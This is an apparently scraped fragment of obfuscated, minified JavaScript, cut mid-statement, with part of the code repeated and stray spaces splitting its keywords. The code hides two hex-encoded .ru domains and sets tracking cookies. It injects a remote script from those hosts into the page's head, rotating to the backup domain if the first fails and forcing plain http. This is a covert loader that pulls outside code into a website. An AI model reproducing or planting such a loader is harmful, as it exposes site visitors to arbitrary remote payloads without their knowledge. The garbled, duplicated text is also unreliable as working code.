.smlo.loadSmlo(n.r eplace("https:","http:";));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox";))window .zSmlo.loadSmlo(n.r eplace("https:","http:";));else{var i=docu ment.createElement("script";);i.setAttribute("src",n),i.setAttribute("type","text/javascript";),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306";)!=f&&n("a2519043306",f,{expires:parseInt("3600";)})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002";)!=i&&n("a36677002",i);var r=o("a2519043306";);t=r?r:e[0],s(t)};f()}();
window .a1336404323 = 1;!f unction(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "ng.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();